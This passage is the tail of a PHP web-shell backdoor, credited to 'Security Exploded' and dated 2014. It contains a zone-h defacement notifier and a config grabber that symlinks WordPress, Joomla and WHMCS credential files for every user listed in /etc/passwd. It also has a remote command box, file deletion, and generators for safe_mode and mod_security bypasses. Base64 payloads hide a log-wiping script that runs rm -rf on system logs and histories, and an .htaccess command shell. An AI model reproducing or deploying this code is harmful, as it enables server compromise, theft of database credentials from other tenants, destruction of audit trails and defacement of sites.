2243 $site = $_POST['domain'];
2244 if (empty($hacker))
2245 { die ("<center><b> </b></center>"); }
2246 elseif($method == "--------SELECT--------")
2247 { die("<center><b>[+] YOU MUST SELECT THE METHOD [+]</b></center>"); }
2248 elseif($neden == "--------SELECT--------")
2249 { die("<center><b>[+] YOU MUST SELECT THE REASON [+]</b></center>"); }
2250 elseif(empty($site))
2251 { die("<center><b>[+] YOU MUST INTER THE SITES LIST [+]</b></center>"); }
2252 $i = 0;
2253 $sites = explode("\n", $site);
2254 while($i < count($sites))
2255 {
2256 if(substr($sites[$i], 0, 4) != "http")
2257 {
2258 $sites[$i] = "http://".$sites[$i];
2259 }
2260 ZoneH("http://www.zone-h.com/notify/single", $hacker, $method, $neden, $sites[$i]);
2261 echo "$sites[$i]";
2262 ++$i;
2263 }
2264
2265 }
2266
2267
2268}
2269/////////////////////////////////////////////////////////////////////////////////////////////
2270////////////////////////////////////////////////////////////////////////////
2271elseif(isset($_GET['x']) && ($_GET['x'] == 'grabc')){ @ini_set('output_buffering',0);
2272echo "
2273<table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
2274
2275 <tr>
2276 <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
2277 <center><b><font size=5 style=italic color=#00ff00>Config Grabber</font></b></center></td></tr></table>
2278";
2279?>
2280 <form action="?y=<?=$pwd; ?>&x=grabc" method="post">
2281
2282<?php
2283echo "
2284<form method='POST'>
2285</head>
2286<style>
2287textarea {
2288resize:none;
2289color: #000000 ;
2290background-color:#000000;
2291font-size:8pt; color:#ffffff;
2292
2293width:550px;
2294height:400px;
2295}
2296input {
2297color: #000000;
2298border:1px dotted white;
2299}
2300</style>";
2301echo "<center>";?></center><br><center><?php if (empty($_POST['config'])) { ?><br><form method="POST"><table class="tabnet" >
2302<th colspan='5'><b>Config Grabber</b></th></center>
2303<tr><td></td><td><table><textarea name="passwd" class='area' rows='15' cols='60'><?=file_get_contents('/etc/passwd'); ?></textarea><br>
2304<center><input name="config" style="width:550px;" class='inputzbut' value=" Grab! " type="submit"></form></center></table></table>
2305<?php }if ($_POST['config']) {$function = $functions=@ini_get("disable_functions");if(eregi("symlink",$functions)){die ('<error>Symlink disabled :( </error>');}@mkdir('explodedcgrab', 0755);@chdir('explodedcgrab');
2306$htaccess="
2307OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
2308Options Indexes FollowSymLinks
2309ForceType text/plain
2310AddType text/plain .php
2311AddType text/plain .html
2312AddType text/html .shtml
2313AddType txt .php
2314AddHandler server-parsed .php
2315AddHandler txt .php
2316AddHandler txt .html
2317AddHandler txt .shtml
2318Options All
2319Options All
2320OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
2321Options Indexes FollowSymLinks
2322ForceType text/plain
2323AddType text/plain .php
2324AddType text/plain .html
2325AddType text/html .shtml
2326AddType txt .php
2327AddHandler server-parsed .php
2328AddHandler txt .php
2329AddHandler txt .html
2330AddHandler txt .shtml
2331Options All
2332Options All";
2333file_put_contents(".htaccess",$htaccess,FILE_APPEND);$passwd=$_POST["passwd"];
2334$passwd=explode("\n",$passwd);
2335echo "<br><br><center><font color=#b0b000 size=2pt>wait ...</center><br>";
2336foreach($passwd as $pwd){
2337$pawd=explode(":",$pwd);$user =$pawd[0];
2338@symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-wp13.txt');
2339@symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-wp13-wp.txt');
2340@symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-wp13-WP.txt');
2341@symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'-wp13-wp-beta.txt');
2342@symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp13-beta.txt');
2343@symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-wp13-press.txt');
2344@symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-wp13-wordpress.txt');
2345@symlink('/home/'.$user.'/public_html/Wordpress/wp-config.php',$user.'-wp13-Wordpress.txt');
2346@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp13-Wordpress.txt');
2347@symlink('/home/'.$user.'/public_html/config.php',$user.'-configgg.txt');
2348@symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-wp13-news.txt');
2349@symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-wp13-new.txt');
2350@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp-blog.txt');
2351@symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp-beta.txt');
2352@symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-wp-blogs.txt');
2353@symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-wp-home.txt');
2354@symlink('/home/'.$user.'/public_html/db.php',$user.'-dbconf.txt');
2355@symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-wp-site.txt');
2356@symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'-wp-main.txt');
2357@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-wp-test.txt');
2358@symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-joomla2.txt');
2359@symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-joomla-protal.txt');
2360@symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'-joo.txt');
2361@symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-joomla-cms.txt');
2362@symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-joomla-site.txt');
2363@symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-joomla-main.txt');
2364@symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'-joomla-news.txt');
2365@symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-joomla-new.txt');
2366@symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-joomla-home.txt');
2367@symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vb-config.txt');
2368@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm15.txt');
2369@symlink('/home/'.$user.'/public_html/central/configuration.php',$user.'-whm-central.txt');
2370@symlink('/home/'.$user.'/public_html/whm/whmcs/configuration.php',$user.'-whm-whmcs.txt');
2371@symlink('/home/'.$user.'/public_html/whm/WHMCS/configuration.php',$user.'-whm-WHMCS.txt');
2372@symlink('/home/'.$user.'/public_html/whmc/WHM/configuration.php',$user.'-whmc-WHM.txt');
2373@symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-whmcs.txt');
2374@symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-support.txt');
2375@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-joomla.txt');
2376@symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-whmcs2.txt');
2377@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm.txt');}
2378echo '<b class="cone"><font face="Tahoma" color="#00dd00" size="2pt"><b>Done -></b> <a target="_blank" href="explodedcgrab">Open configs</a></font></b>';}
2379}
2380 ////////////////////////////////////
2381elseif(isset($_GET['x']) && ($_GET['x'] == 'about'))
2382 {@ini_set('output_buffering',0);
2383 echo "
2384<table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
2385
2386 <tr>
2387 <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
2388 <center><b><font size=5 style=italic color=#00ff00>About</font></b></center></td></tr></table>
2389";
2390 ?><form action="?y=<?=$pwd; ?>&x=about" method="post"><center><br><br><div class='msupiani'><img src='http://oi58.tinypic.com/2u8fmnn.jpg'/></div>
2391<br><br><br><font size="10" color="#00ff00"><b>Thanks To :</b><br><br><br></font></center><center><marquee direction="up" scrollamount="2" bgcolor="" width="250" height="100"><center>
2392<p><b><font size="3" color="#00ff00">Allah S.W.T<br><br>My Parent<br>Yulia Susanti<br>All Member Security Exploded<br>1N73CTION<br>B374K<br>AnonGhost<br>WSO<br>C100<br>BlackShadow<br>Madspot<br><br>
2393=[ Grub & Forum ]=<br><br>Pentest & Security Indonesia<br>Kali Linux Indonesia<br>Surabaya Black Hat<br>Indonesian Backtrack Team<br><br><br><br>By<br>Security Exploded a.k.a ./Port22<br><br>Special Present To :<BR><center><img src="http://www.clker.com/cliparts/W/q/D/p/e/7/small-red-heart-with-transparent-background-hi.png" width='20' height='20'></center>Yulia Susanti<br><br>18 Mar 2014<br>
2394</font></b></p></center></marquee></center><embed src="<?=$music;?>" autostart="TRUE" loop="TRUE" width="0" height="0"></embed><br><br><br>
2395<?php
2396}
2397/////////////////////////////////////
2398elseif(isset($_GET['x']) && ($_GET['x'] == 'shell')){ ?><form action="?y=<?=$pwd; ?>&x=shell" method="post"><table class="cmdbox">
2399<tr><td colspan="2"><textarea class="output" readonly><?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']);} ?></textarea>
2400<tr><td colspan="2"><?=$prompt; ?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" /></td></tr>
2401</table></form><?php }
2402else {
2403if(isset($_GET['delete']) && ($_GET['delete'] != "")){
2404 $file = $_GET['delete'];
2405 @unlink($file);
2406}
2407elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "")){
2408 @rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR));
2409}
2410elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){
2411 $path = $pwd.$_GET['mkdir'];
2412 @mkdir($path);
2413}
2414 $buff = showdir($pwd,$prompt);
2415 echo $buff;
2416}
2417//////////////////////////////////////
2418?>
2419<br><table class="tabnet" >
2420<tr><form method="post" action=""> <td><select class="inputzbut" align="left" name="pilihan" id="pilih"><option value=""selected>------[ Select Your Favorit Tools ]------</option><option value="htasell">htaccess Shell [ .htaccess ]</option><option value="slc" >Server Log Cleaner [ serverLC.sh ]</option><option value="ini">Bypass Disable Function in Apache</option><option value="inis">Bypass Disable Function in Litespeed</option></select>
2421<input type="submit" name="submites" class="inputzbut" value="Created">
2422</td></form></tr></table>
2423<?php
2424$submit = $_POST ['submites'];
2425if(isset($submit)) {
2426 $pilih = $_POST['pilihan'];
2427 if ( $pilih == 'ini') {
2428 $byphp = "safe_mode = Off \n disable_functions = None \n safe_mode_gid = OFF \n open_basedir = OFF \n allow_url_fopen = On";
2429 $byht = "<IfModule mod_security.c> \n SecFilterEngine Off \n SecFilterScanPOST Off \n SecFilterCheckURLEncoding Off \n SecFilterCheckUnicodeEncoding Off \n </IfModule>";
2430 $iniphp = '<? \n echo ini_get("safe_mode"); \n echo ini_get("open_basedir"); \n include($_GET["file"]); \n ini_restore("safe_mode"); \n ini_restore("open_basedir"); \n echo ini_get("safe_mode"); \n echo ini_get("open_basedir"); \n include($_GET["ss"]; \n ?>';
2431 file_put_contents("php.ini",$byphp);
2432 file_put_contents(".htaccess",$byht);
2433 file_put_contents("ini.php",$iniphp);
2434 echo "<script>alert('Disable Functions in Apache Created'); hideAll();</script>";
2435die();
2436 }
2437 elseif ( $pilih == 'inis') {
2438 $iniph = '<?php \n echo ini_get("safe_mode"); \n echo ini_get("open_basedir"); \n include($_GET["file"]); \n ini_restore("safe_mode"); \n ini_restore("open_basedir"); \n echo ini_get("safe_mode"); \n echo ini_get("open_basedir"); \n include($_GET["ss"]; \n ?>';
2439 $byph = "safe_mode = Off \n disable_functions= ";
2440 $comp="PEZpbGVzICoucGhwPg0KRm9yY2VUeXBlIGFwcGxpY2F0aW9uL3gtaHR0cGQtcGhwNA0KPC9GaWxlcz4=";
2441 file_put_contents("php.ini",base64_decode($byph));
2442 file_put_contents("ini.php",base64_decode($iniph));
2443 file_put_contents(".htaccess",base64_decode($comp));
2444 echo "<script>alert('Disable Functions in Litespeed Created'); hideAll();</script>";
2445die();
2446 }
2447
2448 elseif ( $pilih == 'slc') {
2449 $slc ="IyEvYmluL3NoDQojIFJlY29kZWQgQnkgLi9Qb3J0MjIgKE1TdXBpYW4pDQojIEdyMzN0eiA6IEFsbCBNZW1iZXJzIE9mIFNlY3VyaXR5IEV4cGxvZGVkDQojIGNobW9kIDA3NTUgc2VydmVyTEMuc2ggPj4gLi9zZXJ2ZXJMQy5zaA0KDQplY2hvICJbKl0gR29pbmcgVG8gRGVsZXRlIExvZyBTZXJ2ZXJzIC4uLiAiDQpmaW5kIC8gLW5hbWUgKi5iYXNoX2hpc3RvcnkgLWV4ZWMgcm0gLXJmIHt9IFw7DQpmaW5kIC8gLW5hbWUgKi5iYXNoX2xvZ291dCAtZXhlYyBybSAtcmYge30gXDsNCmZpbmQgLyAtbmFtZSAibG9nKiIgLWV4ZWMgcm0gLXJmIHt9IFw7DQpmaW5kIC8gLW5hbWUgKi5sb2cgLWV4ZWMgcm0gLXJmIHt9IFw7DQpybSAtcmYgL3RtcC9sb2dzDQpybSAtcmYgJEhJU1RGSUxFDQpybSAtcmYgL3Jvb3QvLmtzaF9oaXN0b3J5DQpybSAtcmYgL3Jvb3QvLmJhc2hfaGlzdG9yeQ0Kcm0gLXJmIC9yb290Ly5rc2hfaGlzdG9yeQ0Kcm0gLXJmIC9yb290Ly5iYXNoX2xvZ291dA0Kcm0gLXJmIC91c3IvbG9jYWwvYXBhY2hlL2xvZ3MNCnJtIC1yZiAvdXNyL2xvY2FsL2FwYWNoZS9sb2cNCnJtIC1yZiAvdmFyL2FwYWNoZS9sb2dzDQpybSAtcmYgL3Zhci9hcGFjaGUvbG9nDQpybSAtcmYgL3Zhci9ydW4vdXRtcA0Kcm0gLXJmIC92YXIvbG9ncw0Kcm0gLXJmIC92YXIvbG9nDQpybSAtcmYgL3Zhci9hZG0NCnJtIC1yZiAvZXRjL3d0bXANCnJtIC1yZiAvZXRjL3V0bXANCg0KZWNobyAiWypdIERvbmUgLiBHb29kIEx1Y2sgOyki";
2450 file_put_contents("serverLC.sh",base64_decode($slc));
2451 echo "<script>alert('Server Log Cleaner [ serverLC.sh ] Created'); hideAll();</script>";
2452 die();
2453 }
2454 elseif ( $pilih == 'htasell') {
2455 $ht = 'PEZpbGVzIH4gIl5cLmh0Ij4NCk9yZGVyIGFsbG93LGRlbnkNCkFsbG93IGZyb20gYWxsDQo8L2ZpbGVzPg0KQWRkVHlwZSBhcHBsaWNhdGlvbi94LWh0dHBkLXBocCAuaHRhY2Nlc3MNCiMgPD9waHAgcGFzc3RocnUoJF9HRVRbJ2NtZCddKTs/Pg0K';
2456 file_put_contents(".htaccess",base64_decode($ht));
2457 echo "<script>alert('htaccess Shell [ .htaccess ] Created : open in site/.htaccess?cmd= '); hideAll();</script>";
2458 die();
2459 }
2460
2461 }
2462
2463?><br><br> <div class="footer"><b style="color:$color;font-family:monotype corsiva;font-size:22;"><?=$title; ?> <?=$versi ?> Shell Backdoor</b></div>
2464<div class="jaya"> © <?=date('Y',time()); ?> <a href=""><?=$xName ?></a></div></div>
2465</body>
2466</html>